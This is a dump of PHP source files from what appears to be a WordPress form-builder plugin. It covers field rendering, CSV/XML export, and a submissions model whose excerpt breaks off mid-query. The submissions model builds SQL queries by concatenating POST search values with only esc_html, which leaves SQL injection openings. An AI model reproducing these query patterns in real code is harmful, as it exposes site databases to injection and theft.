                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos'].'"><input type="hidden" value="'.$element_value.'" id="wdform_'.$id1.'_slider_value'.$form_id.'" name="wdform_'.$id1.'_slider_value'.$form_id.'"><div name="'.$id1.'_element'.$form_id.'" id="wdform_'.$id1.'_element'.$form_id.'" style="width: '.$param['w_field_width'].'px;" '.$param['attributes'].'"></div><div align="left" style="display: inline-block; width: 33.3%; text-align: left;"><span id="wdform_'.$id1.'_element_min'.$form_id.'" class="label">'.$param['w_field_min_value'].'</span></div><div align="right" style="display: inline-block; width: 33.3%; text-align: center;"><span id="wdform_'.$id1.'_element_value'.$form_id.'" class="label">'.$element_value.'</span></div><div align="right" style="display: inline-block; width: 33.3%; text-align: right;"><span id="wdform_'.$id1.'_element_max'.$form_id.'" class="label">'.$param['w_field_max_value'].'</span></div></div></div>';
                    
                    
                $onload_js .='
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'")[0].slide = null;
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'").slider({
                    range: "min",
                    value: eval('.$element_value.'),
                    min: eval('.$param['w_field_min_value'].'),
                    max: eval('.$param['w_field_max_value'].'),
                    slide: function( event, ui ) {	
                    
                      jQuery("#wdform_'.$id1.'_element_value'.$form_id.'").html("" + ui.value)
                      jQuery("#wdform_'.$id1.'_slider_value'.$form_id.'").val("" + ui.value)

                    }
                    });
                ';
            
              break;
            }
            
            
            case 'type_range': {
            
              if($element_value=='')
                $element_value = '-';
                
                $params_names=array('w_field_label_size','w_field_label_pos','w_field_range_width','w_field_range_step','w_field_value1', 'w_field_value2', 'w_mini_labels', 'w_required','w_class');
                $temp=$params;
                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }

                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
              
                $element_value = explode('-',$element_value);
                
                $w_mini_labels = explode('***',$param['w_mini_labels']);
                
                $rep ='<div type="type_range" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
               
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos'].'"><div style="display: table;"><div style="display: table-row;"><div valign="middle" align="left" style="display: table-cell;"><input type="text" value="'.($element_value[0]!= 'null' ? $element_value[0] : '').'" name="wdform_'.$id1.'_element'.$form_id.'0" id="wdform_'.$id1.'_element'.$form_id.'0" style="width: '.$param['w_field_range_width'].'px;"  '.$param['attributes'].'></div><div valign="middle" align="left" style="display: table-cell; padding-left: 4px;"><input type="text" value="'.($element_value[1]!= 'null' ? $element_value[1] : '').'" name="wdform_'.$id1.'_element'.$form_id.'1" id="wdform_'.$id1.'_element'.$form_id.'1" style="width: '.$param['w_field_range_width'].'px;" '.$param['attributes'].'></div></div><div style="display: table-row;"><div valign="top" align="left" style="display: table-cell;"><label class="mini_label" id="wdform_'.$id1.'_mini_label_from">'.$w_mini_labels[0].'</label></div><div valign="top" align="left" style="display: table-cell;"><label class="mini_label" id="wdform_'.$id1.'_mini_label_to">'.$w_mini_labels[1].'</label></div></div></div></div></div>';
                 
                $onload_js .='
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'0")[0].spin = null;
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'1")[0].spin = null;
                  
                  spinner0 = jQuery("#wdform_'.$id1.'_element'.$form_id.'0").spinner();
                  spinner0.spinner( "value", "'.($element_value[0]!= 'null' ? $element_value[0] : '').'");
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'").spinner({ step: '.$param['w_field_range_step'].'});
                  
                  spinner1 = jQuery("#wdform_'.$id1.'_element'.$form_id.'1").spinner();
                  spinner1.spinner( "value", "'.($element_value[1]!= 'null' ? $element_value[1] : '').'");
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'").spinner({ step: '.$param['w_field_range_step'].'});
                ';
          
              break;
            }
            
            case 'type_grading': { 
                $params_names=array('w_field_label_size','w_field_label_pos', 'w_items', 'w_total', 'w_required','w_class');
                $temp=$params;
                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }

                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
                          $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
              
                
                $element_value = explode(':', $element_value);
                
                $w_items = explode('***',$param['w_items']);
                  
                $w_items_labels =implode(':',$w_items);
                
                $grading_items ='';
                
              
                for($i=0; $i<(count($element_value))/2-1; $i++) {
                  $value=$element_value[$i];

                  $grading_items .= '<div class="wdform_grading"><input type="text" id="wdform_'.$id1.'_element'.$form_id.'_'.$i.'" name="wdform_'.$id1.'_element'.$form_id.'_'.$i.'"  value="'.$value.'" '.$param['attributes'].'><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.'_'.$i.'">'.$w_items[$i].'</label></div>';
                    
                }
                  
                $rep ='<div type="type_grading" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos'].'"><input type="hidden" value="'.$param['w_total'].'" name="wdform_'.$id1.'_grading_total'.$form_id.'" id="wdform_'.$id1.'_grading_total'.$form_id.'"><div id="wdform_'.$id1.'_element'.$form_id.'">'.$grading_items.'<div id="wdform_'.$id1.'_element_total_div'.$form_id.'" class="grading_div">Total: <span id="wdform_'.$id1.'_sum_element'.$form_id.'">0</span>/<span id="wdform_'.$id1.'_total_element'.$form_id.'">'.$param['w_total'].'</span><span id="wdform_'.$id1.'_text_element'.$form_id.'"></span></div></div></div></div>';
                
                $onload_js.='
                jQuery("#wdform_'.$id1.'_element'.$form_id.' input").change(function() {sum_grading_values("wdform_'.$id1.'","'.$form_id.'");});';
                
                $onload_js.='
                jQuery("#wdform_'.$id1.'_element'.$form_id.' input").keyup(function() {sum_grading_values("wdform_'.$id1.'","'.$form_id.'");});';
              
                
                $onload_js.='
                sum_grading_values("wdform_'.$id1.'","'.$form_id.'");';
                
                $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_hidden_item'.$form_id.'\" value = \"'.$w_items_labels.':'.$param['w_total'].'\" />").appendTo("#form'.$form_id.'");
                ';
            
              break;
            }
            case 'type_matrix': {
            
                $params_names=array('w_field_label_size','w_field_label_pos', 'w_field_input_type', 'w_rows', 'w_columns', 'w_required','w_class');
                $temp=$params;
                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                }

                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
                
                $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	 
                $w_rows = explode('***',$param['w_rows']);
                $w_columns = explode('***',$param['w_columns']); 
                $element_value = str_replace("******matrix***","",$element_value);
                $element_value = explode($param['w_field_input_type'].'***', $element_value);
                $element_value = explode('***', $element_value[1]); 
                $column_labels ='';
                
                for($i=1; $i<count($w_columns); $i++) {
                  $column_labels .= '<div><label class="wdform-ch-rad-label">'.$w_columns[$i].'</label></div>';
                }
                
                $rows_columns = ''; 
                $for_matrix =0; 
                for($i=1; $i<count($w_rows); $i++) {
                
                  $rows_columns .= '<div class="wdform-matrix-row'.($i%2).'"><div class="wdform-matrix-column"><label class="wdform-ch-rad-label" >'.$w_rows[$i].'</label></div>';
                  
                
                  for($k=1; $k<count($w_columns); $k++) {
                    $rows_columns .= '<div class="wdform-matrix-cell">';
                    if($param['w_field_input_type']=='radio') { 	
                      if (array_key_exists($i-1,$element_value))
                        $to_check=$element_value[$i-1];
                      else
                        $to_check= '' ;
                                      
                      $rows_columns .= '<div class="radio-div"><input id="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'"  type="radio" name="wdform_'.$id1.'_input_element'.$form_id.''.$i.'" value="'.$i.'_'.$k.'" '.($to_check==$i.'_'.$k ? 'checked="checked"' : '').'><label for="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'"></label></div>';
                     
                    }
                    else
                      if($param['w_field_input_type']=='checkbox') {
                        
                        if (array_key_exists($for_matrix,$element_value))
                          $to_check=$element_value[$for_matrix];
                        else
                          $to_check= '' ;
                            
                        $rows_columns .= '<div class="checkbox-div"><input id="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'" type="checkbox" name="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'" value="1" '.($to_check=="1" ? 'checked="checked"' : '').'><label for="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'"></label></div>';
                        
                        $for_matrix++;
                      }
                      else
                        if($param['w_field_input_type']=='text') {
                          $rows_columns .= '<input id="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'" type="text" name="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'" value="'.(array_key_exists($for_matrix,$element_value) ? $element_value[$for_matrix] : '').'">';
                        
                          $for_matrix++;										
                        }	
                        else
                          if($param['w_field_input_type']=='select') {
                            $rows_columns .= '<select id="wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k.'" name="wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k.'" ><option value="" '.(array_key_exists($for_matrix,$element_value) ? ($element_value[$for_matrix]=="" ? "selected=\"selected\"": "") : '').'> </option><option value="yes" '.(array_key_exists($for_matrix,$element_value) ? ($element_value[$for_matrix]=="yes" ? "selected=\"selected\"": "") : '').'>Yes</option><option value="no" '.(array_key_exists($for_matrix,$element_value) ? ($element_value[$for_matrix]=="no" ? "selected=\"selected\"": "") : '').'>No</option></select>';
                            
                            $for_matrix++;	
                          }
                    $rows_columns.='</div>';
                  }
                    
                  $rows_columns .= '</div>';	
                }
                  
                $rep ='<div type="type_matrix" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
                 
                $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos'].'"><div id="wdform_'.$id1.'_element'.$form_id.'" class="wdform-matrix-table" '.$param['attributes'].'><div style="display: table-row-group;"><div class="wdform-matrix-head"><div style="display: table-cell;"></div>'.$column_labels.'</div>'.$rows_columns.'</div></div></div></div>';
                
                $onsubmit_js.='
                  jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_input_type'.$form_id.'\" value = \"'.$param['w_field_input_type'].'\" /><input type=\"hidden\" name=\"wdform_'.$id1.'_hidden_row'.$form_id.'\" value = \"'.$param['w_rows'].'\" /><input type=\"hidden\" name=\"wdform_'.$id1.'_hidden_column'.$form_id.'\" value = \"'.$param['w_columns'].'\" />").appendTo("#form'.$form_id.'");
                  ';		
              
              break;
            }
          }
          $form = str_replace('%'.$id1.' - '.$labels[$id1s_key].'%', $rep, $form);
        }
      }
      echo $form;
      ?>
      
	  </div>
	  <input type="hidden" name="option" value="com_formmaker"/>
      <input type="hidden" id="current_id" name="current_id" value="<?php echo $rows[0]->group_id; ?>" />
      <input type="hidden" name="form_id" value="<?php echo $rows[0]->form_id; ?>" />
      <input type="hidden" name="date" value="<?php echo $rows[0]->date; ?>" />
      <input type="hidden" name="ip" value="<?php echo $rows[0]->ip; ?>" />
      <input type="hidden" id="task" name="task" value="" />
      <input type="hidden" value="<?php echo WD_FMC_URL; ?>" id="form_plugins_url" />
      <script type="text/javascript">
        function  pressbutton() {
          <?php echo $onsubmit_js; ?>;
        }
        jQuery("div[type='type_number'] input, div[type='type_phone'] input, div[type='type_spinner'] input, div[type='type_range'] input, .wdform-quantity").keypress(function(evt) {
          return check_isnum(evt);
        });	
        jQuery("div[type='type_grading'] input").keypress(function() {
          return check_isnum_or_minus(event);
        });
        plugin_url = '<?php echo WD_FMC_URL; ?>';
        <?php
        if ($onload_js) {
          ?>
          jQuery(window).load(function () {
            <?php echo $onload_js; ?>;
          });
          <?php
        }
        ?> 
      </script>
    </form> 
    <?php
  }
}

?>
admin/views/FMViewGenerete_xml_fmc.php000060400000007535152434416630014041 0ustar00<?php

class FMViewGenerete_xml_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;

  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
	$form_id = (int)$_REQUEST['form_id'];  
	$params = $this->model->get_data();
	$limitstart = (int)$_REQUEST['limitstart'];
	$send_header = (int)$_REQUEST['send_header'];
	$data = $params[0];
	$title = $params[1]; 
	define('PHP_TAB', "\t");
	
	$upload_dir = wp_upload_dir();
	$file_path = $upload_dir['basedir'] . '/form-maker'; 
	if (!is_dir($file_path)) { 
		mkdir($file_path, 0777); 
	} 
	$tempfile = $file_path.'/export'.$form_id.'.txt';
	if($limitstart == 0 && file_exists ($tempfile))
		unlink($tempfile);
	$output = fopen($tempfile, "a");
	if($limitstart == 0) {
		fwrite($output, '<?xml version="1.0" encoding="utf-8" ?>'.PHP_EOL);
		fwrite($output, '<form title="'.$title.'">'.PHP_EOL);
	}	
	
	foreach ($data as $key1 => $value1) {
		fwrite($output, PHP_TAB.'<submission id="'.$key1.'">'.PHP_EOL);
		foreach ($value1 as $key => $value) {
			fwrite($output, PHP_TAB.PHP_TAB.'<field title="'.$key.'">'.PHP_EOL);
			fwrite($output, PHP_TAB.PHP_TAB.PHP_TAB.'<![CDATA['.$value.']]>'.PHP_EOL);
			fwrite($output, PHP_TAB.PHP_TAB.'</field>'.PHP_EOL);
		}
		fwrite($output, PHP_TAB.'</submission>'.PHP_EOL);
	}
	
	if($send_header == 1){
		fwrite($output, '</form>');
		fclose($output);
		
		$txtfile = fopen($tempfile, "r");
		$txtfilecontent = fread($txtfile, filesize($tempfile));
		fclose($txtfile);
		$filename = $title . "_" . date('Ymd') . ".xml";
		header('Content-Encoding: Windows-1252');
		header('Content-type: text/xml; charset=utf-8');
		header("Content-Disposition: attachment; filename=\"$filename\"");
		
		echo $txtfilecontent;
		unlink($tempfile);
		die(); 
	} 
	
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewGenerete_csv_fmc.php000060400000007721152434416630014031 0ustar00<?php

class FMViewGenerete_csv_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;

  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
	public function display() {
		$fmc_settings = get_option('fmc_settings');	
		$csv_delimiter = isset($fmc_settings['csv_delimiter']) ? $fmc_settings['csv_delimiter'] : ',';	
		$form_id = (int)$_REQUEST['form_id'];
		$params = $this->model->get_data();
		$limitstart = (int)$_REQUEST['limitstart'];
		$send_header = (int)$_REQUEST['send_header'];
		$data = $params[0];
		$title = $params[1]; 
		$is_paypal_info = $params[2];
		
		$all_keys = array();
		foreach ($data as $row) {
			$all_keys = array_merge($all_keys, $row);
		}

		$keys_array = array_keys($all_keys);
		foreach ($data as $key => $row) {
			foreach ($keys_array as $key1 => $value) {
				if(!array_key_exists ( $value , $row ))
					array_splice($row, $key1, 0, '');
			}
			$data[$key] = $row;
		}

		$upload_dir = wp_upload_dir();
		$file_path = $upload_dir['basedir'] . '/form-maker'; 
		if (!is_dir($file_path)) { 
			mkdir($file_path, 0777); 
		} 
		$tempfile = $file_path.'/export'.$form_id.'.txt';
		if($limitstart == 0 && file_exists ($tempfile))
			unlink($tempfile);
		
		$output = fopen($tempfile, "a");
		if($limitstart == 0) {
			fputcsv($output, str_replace('PAYPAL_', '', $keys_array), $csv_delimiter);
		}
		
		foreach ($data as $record) {
			fputcsv($output, $record, $csv_delimiter);
		}
		fclose($output);
		
		if($send_header == 1){
			$txtfile = fopen($tempfile, "r");
			$txtfilecontent = fread($txtfile, filesize($tempfile));
			fclose($txtfile);

			$filename = $title . "_" . date('Ymd') . ".csv";
			header('Content-Encoding: Windows-1252');
			header('Content-type: text/csv; charset=Windows-1252');
			header("Content-Disposition: attachment; filename=\"$filename\"");
			
			echo $txtfilecontent;
			unlink($tempfile);
			die(); 
		}

	}

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/.htaccess000044400000000424152434416630007440 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>admin/models/FMModelGoptions_fmc.php000060400000004321152434416630013467 0ustar00<?php

class FMModelGoptions_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelFrommapeditinpopup_fmc.php000060400000004335152434416630015554 0ustar00<?php

class FMModelFrommapeditinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelSubmissions_fmc.php000060400000072716152434416630014220 0ustar00<?php 
class FMModelSubmissions_fmc {
	////////////////////////////////////////////////////////////////////////////////////////
	// Events                                                                             //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constants                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Variables                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constructor & Destructor                                                           //
	////////////////////////////////////////////////////////////////////////////////////////
	public function __construct() {
	}
	////////////////////////////////////////////////////////////////////////////////////////
	// Public Methods                                                                     //
	////////////////////////////////////////////////////////////////////////////////////////
	public function blocked_ips() {
		global $wpdb;
		$ips = $wpdb->get_col('SELECT ip FROM ' . $wpdb->prefix . 'formmaker_blocked');
		return $ips;
	}

	public function get_form_titles() {
		global $wpdb;
		$query = "SELECT id, title FROM " . $wpdb->prefix . "formmaker WHERE `id` IN(" . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ") order by title";
		$forms = $wpdb->get_results($query);
		return $forms;
	}
  
	public function get_statistics($form_id) { 
		global $wpdb;
		$statistics = array();
		$query = $wpdb->prepare('SELECT count(distinct group_id) FROM ' . $wpdb->prefix . 'formmaker_submits WHERE form_id ="%d"', $form_id);
		$statistics["total_entries"] = $wpdb->get_var($query);
		$query = $wpdb->prepare('SELECT `views` FROM ' . $wpdb->prefix . 'formmaker_views WHERE form_id="%d"', $form_id);
		$statistics["total_views"] = $wpdb->get_var($query);
		if ($statistics["total_views"]) {
			$statistics["conversion_rate"] = round((($statistics["total_entries"] / $statistics["total_views"]) * 100), 2) . '%';
		}
		else {
			$statistics["conversion_rate"] = '0%';
		}
		return $statistics;
	}
  
  public function get_labels_parameters($form_id) {
    global $wpdb;
    $labels = array();
    $labels_id = array();
    $sorted_labels_id = array();
    $label_names = array();
    $label_types = array();
    $sorted_label_types = array();
    $label_names_original = array();
    $labels_parameters = array();
    $join_query = array();
    $join_where = array();
    $rows_ord = array();
    $join = '';
    for ($i = 0; $i < 8; $i++) {
      array_push($labels_parameters, NULL);
    }
    $sorted_label_names = array();
    $sorted_label_names_original = array();
    $where_labels = array();
    $where2 = array();
	
	$pagination_clicked = (isset($_POST['pagination_clicked']) && $_POST['pagination_clicked'] == '1' ? '1' : '0');
	
	$order_by = ((isset($_POST['order_by']) && esc_html(stripslashes($_POST['order_by'])) != '') ? esc_html(stripslashes($_POST['order_by'])) : 'group_id');
    $asc_or_desc = ((isset($_POST['asc_or_desc']) && $_POST['asc_or_desc'] == 'desc') ? 'desc' : 'asc');
    $limit = ((isset($_POST['page_number'])) ? ((int) $_POST['page_number'] - 1) * 20 : 0);
    $lists['hide_label_list'] = ((isset($_POST['hide_label_list'])) ? esc_html(stripslashes($_POST['hide_label_list'])) : '');
    $lists['startdate'] = ((isset($_POST['startdate'])) ? esc_html(stripslashes($_POST['startdate'])) : '');
    $lists['enddate'] = ((isset($_POST['enddate'])) ? esc_html(stripslashes($_POST['enddate'])) : '');
    $lists['ip_search'] = ((isset($_POST['ip_search'])) ? esc_html(stripslashes($_POST['ip_search'])) : '');
	
	$lists['username_search'] = ((isset($_POST['username_search'])) ? esc_html(stripslashes($_POST['username_search'])) : '');
	$lists['useremail_search'] = ((isset($_POST['useremail_search'])) ? esc_html(stripslashes($_POST['useremail_search'])) : '');
	$lists['id_search'] = ((isset($_POST['id_search'])) ? esc_html(stripslashes($_POST['id_search'])) : '');
	
    if ($lists['ip_search']) {
      $where[] = 'ip LIKE "%' . $lists['ip_search'] . '%"';
    }
    if ($lists['startdate'] != '') {
      $where[] = " `date`>='" . $lists['startdate'] . " 00:00:00' ";
    }
    if ($lists['enddate'] != '') {
      $where[] = " `date`<='" . $lists['enddate'] . " 23:59:59' ";
    }
	
	
	if ($lists['username_search']) {
      	$where[] = 'user_id_wd IN (SELECT ID FROM ' . $wpdb->prefix . 'users WHERE display_name LIKE "%'.$lists['username_search'].'%")';
    }
	if ($lists['useremail_search']) {
      $where[] = 'user_id_wd IN (SELECT ID FROM ' . $wpdb->prefix . 'users WHERE user_email LIKE "%'.$lists['useremail_search'].'%")';
    }
	
	if ($lists['id_search']) {
      $where[] = 'group_id ='.$lists['id_search'];
    }
	
    $where[] = 'form_id=' . $form_id . '';
    $where = (count($where) ? ' ' . implode(' AND ', $where) : ''); 
    if ($order_by == 'group_id' or $order_by == 'date' or $order_by == 'ip') { 
      $orderby = ' ORDER BY ' . $order_by . ' ' . $asc_or_desc . '';
    }elseif($order_by == 'display_name' or $order_by == 'user_email'){
	  $orderby 	= ' ORDER BY (SELECT '.$order_by.' FROM ' . $wpdb->prefix . 'users WHERE ID=user_id_wd) '. $asc_or_desc .'';
	}
    else {
      $orderby = "";
    }
		if ($form_id) {
      for($i = 0; $i < 8; $i++) {
        array_pop($labels_parameters);
      }
      $query = "SELECT distinct element_label FROM " . $wpdb->prefix . "formmaker_submits WHERE ". $where;
      $results = $wpdb->get_results($query); 
      for ($i = 0; $i < count($results); $i++) {
        array_push($labels, $results[$i]->element_label);
		  }
      $form = $wpdb->get_row($wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE id='%d'", $form_id));
      if (strpos($form->label_order, 'type_paypal_')) {
        $form->label_order = $form->label_order . "item_total#**id**#Item Total#**label**#type_paypal_payment_total#****#total#**id**#Total#**label**#type_paypal_payment_total#****#0#**id**#Payment Status#**label**#type_paypal_payment_status#****#";
      }

      $form_labels = explode('#****#', $form->label_order);
      $form_labels = array_slice($form_labels, 0, count($form_labels) - 1);
	 
      foreach ($form_labels as $key => $form_label) {
        $label_id = explode('#**id**#', $form_label);
        array_push($labels_id, $label_id[0]);
        $label_name_type = explode('#**label**#', $label_id[1]);
        array_push($label_names_original, $label_name_type[0]);
        $ptn = "/[^a-zA-Z0-9_]/";
        $rpltxt = "";
        $label_name = preg_replace($ptn, $rpltxt, $label_name_type[0]);
        array_push($label_names, $label_name);
        array_push($label_types, $label_name_type[1]);
      }
	
      foreach ($labels_id as $key => $label_id) {
        if (in_array($label_id, $labels)) {
          if (!in_array($label_id, $sorted_labels_id)) {
            array_push($sorted_labels_id, $label_id);
          }
          array_push($sorted_label_names, $label_names[$key]);
          array_push($sorted_label_types, $label_types[$key]);
          array_push($sorted_label_names_original, $label_names_original[$key]);
          if (isset($_POST[$form_id . '_' . $label_id . '_search'])) {
            $search_temp = esc_html($_POST[$form_id . '_' . $label_id . '_search']);
          } 
          else {
            $search_temp = '';
          }
          $search_temp = strtolower($search_temp);
          $lists[$form_id . '_' . $label_id . '_search'] = $search_temp;
          if ($search_temp) {
            $join_query[] = 'search';
            $join_where[] = array('label' => $label_id, 'search' => $search_temp);
          }
        }
      }
      if (strpos($order_by, "_field")) { 	  
        if (in_array(str_replace("_field", "", $order_by), $labels)) {
          $join_query[]	= 'sort';
          $join_where[]	= array('label'=>str_replace("_field", "", $order_by));
        }
      }
      $cols = 'group_id';
      if ($order_by == 'date' or $order_by == 'ip') {
        $cols = 'group_id, date, ip';
      }
      switch (count($join_query)) {
        case 0:
          $join = 'SELECT distinct group_id FROM ' . $wpdb->prefix . 'formmaker_submits WHERE '. $where;
          break;
        case 1:
          if ($join_query[0] == 'sort') {
            $join = 'SELECT group_id FROM ' . $wpdb->prefix . 'formmaker_submits WHERE ' . $where . ' AND element_label="' . $join_where[0]['label'] . '" ';
            $join_count	= 'SELECT count(group_id) FROM ' . $wpdb->prefix . 'formmaker_submits WHERE form_id="' . $form_id . '" AND element_label="' . $join_where[0]['label'] . '" ';
            $orderby =	' ORDER BY `element_value` ' . $asc_or_desc;
          } 
          else {
            $join = 'SELECT group_id FROM ' . $wpdb->prefix . 'formmaker_submits WHERE element_label="' . $join_where[0]['label'] . '" AND  element_value LIKE "%' . $join_where[0]['search'] . '%" AND ' . $where;
          }
          break;			
        default:
          $join = 'SELECT t.group_id FROM (SELECT ' . $cols . '  FROM ' . $wpdb->prefix . 'formmaker_submits WHERE ' . $where . ' AND element_label="' . $join_where[0]['label'] . '" AND  element_value LIKE "%' . $join_where[0]['search'] . '%" ) as t ';
